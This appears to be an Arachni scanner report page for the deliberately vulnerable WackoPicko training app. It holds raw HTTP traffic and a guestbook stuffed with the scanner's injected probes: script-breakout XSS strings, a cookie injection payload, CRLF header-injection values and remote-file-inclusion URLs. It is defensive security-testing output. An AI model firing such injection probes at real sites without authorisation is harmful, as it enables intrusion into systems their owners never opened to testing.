      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login">
                  <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="">
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;">
          </form>
        </div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br>
    But that's not all, you can also buy the rights to the high quality <br>
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    </p><h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  <p></p>
  <p>
    </p><h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  <p></p>
  <p>
    </p><h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  <p></p>
  <p>
    </p><h4>Or you can test to see if WackoPicko can handle a file:</h4> <br>
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script><form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000">Check this file: <input name="userfile" type="file"> <br>With this name: <input name="name" type="text"> <br> <br><input type="submit" value="Send File"><br> </form>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  <p></p>
</div>


       <div class="column span-24 first last" id="footer">
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  
  
   </body></html>
HTTP response body

This is the original HTTP response body.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login" >
                  <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
          </form>
        </div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  </p>
</div>


       <div class="column span-24 first last" id="footer" >
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  </body>
</html>  
   

Injected seed Proof
';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'
';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'
Type In Action Default inputs Updated inputs
cookie http://192.168.0.26/WackoPicko/pictures/search.php?query=&x=38&y=12 http://192.168.0.26/WackoPicko/guestbook/
PHPSESSID
decslc8vmakk398sqkq9619t72
PHPSESSID
';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'
Transitions

Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.

# Time Event Element Options
0 0.681898 load page
URL http://192.168.0.26/WackoPicko/guestbook/
1 0.108019 request http://192.168.0.26/WackoPicko/guestbook/
2 0.108113 request http://192.168.0.26/WackoPicko/css/stylings.php

Execution-flow sinks

Execution-flow sinks log the successful execution of an injected Javascript payload within the page's Javascript environment. Each sink is a point of payload execution.

# Data
0

No helper data logged.

Inspect

HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/guestbook/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID='%3Bwindow.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:03 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=8hvf3606cb47triol4mac47li3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1606
Content-Type: text/html

<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">1</p>
	<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot;// </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot; </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot;// </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot; </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
		<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
	<p> - by arachni_name </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
	<p> - by arachni_name </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
		<p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt; </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;,x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:&quot; </p>
		<p class="comment">1</p>
	<p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
		<p class="comment"></script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
	<p> - by arachni_name </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
	<p> - by arachni_name </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
	<p> - by arachni_name </p>
		<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
	<p> - by arachni_name </p>
		<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
		<p class="comment">1</p>
	<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1</p>
	<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Browser-evaluated body

This is the browser-evaluated body, as a result of the listed transitions.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
<html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->


  
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login">
                  <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="">
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;">
          </form>
        </div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

        <p class="comment">1</p>
        <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">1</p>
        <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
